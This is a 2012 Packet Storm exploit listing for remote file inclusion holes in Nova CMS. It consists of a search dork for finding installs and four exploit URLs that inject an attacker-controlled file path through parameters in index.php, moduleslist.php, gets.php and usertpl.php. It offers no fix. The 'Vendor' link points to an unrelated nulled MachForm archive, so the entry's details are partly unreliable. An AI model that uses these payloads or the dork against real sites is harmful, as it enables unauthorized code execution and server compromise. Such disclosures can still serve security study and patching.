Nova CMS Remote File Inclusion

2012-02-11T00:00:00
ID PACKETSTORM:109669
Type packetstorm
Reporter indoushka
Modified 2012-02-11T00:00:00

Description

                                        
                                            `==========================   
Nova CMS RFI Vulnerability   
==========================   
# Vendor: http://canopus.oron.com/i755lr7evek7np4dpndrvbqcqhs3uj4igorbmlhaqwglgek3qc2old7whll7z4mlrtcyk73t/MachForm.v2.4.PHP.NULL-DGT.zip  
  
# Date: 2012-1-27   
  
# Author : indoushka   
  
########################################################  
  
# Exploit By indoushka   
  
-------------  
  
dork : Copyright ©2005-2011 by Nova CMS  
  
Function: include File: index.php Line: 182  
Exploit: http://localhost/novacms/optimizer/index.php?fileType=[EV!L]  
  
##################################################  
  
Function: include File: moduleslist.php Line: 182  
Exploit: http://localhost/novacms/administrator/modules/moduleslist.php?id}=[EV!L]  
  
##################################################  
  
Function: require_once File: gets.php Line: 8  
Exploit: http://localhost/novacms/includes/function/gets.php?filename=[EV!L]  
  
##################################################  
  
Function: require File: usertpl.php Line: 60  
Exploit: http://localhost/novacms/includes/function/usertpl.php?conf[blockfile]}=[EV!L]  
  
##################################################  
  
----------------------------------------------------------  
`